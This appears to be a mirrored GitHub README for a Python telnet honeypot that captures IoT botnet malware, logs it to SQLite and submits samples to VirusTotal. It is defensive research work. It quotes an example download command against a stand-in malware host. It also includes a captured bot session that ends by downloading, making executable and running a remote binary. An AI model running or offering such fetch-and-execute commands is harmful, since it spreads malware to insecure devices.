Giters

n0z3r0 / telnet-iot-honeypot

Python telnet honeypot for catching botnet binaries

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Telnet IoT honeypot

'Python telnet honeypot for catching botnet binaries'

This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.

The script tries to identify download commands like wget http://haxx0r.net/malware.bin, extracts the URLs and tries to download and indentify the malware-binaries.

Statistics of the downloaded binaries and corresponding Urls/Telnet connections may be created via the generated SQLite database.

All binaries are also uploaded to virustotal.com, if not already present.

Sample Connection

enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit

Images

Screenshot 1

Screenshot 2

Screenshot 3

About

Python telnet honeypot for catching botnet binaries

Languages

Language:HTML 46.0%Language:Python 38.2%Language:PHP 15.8%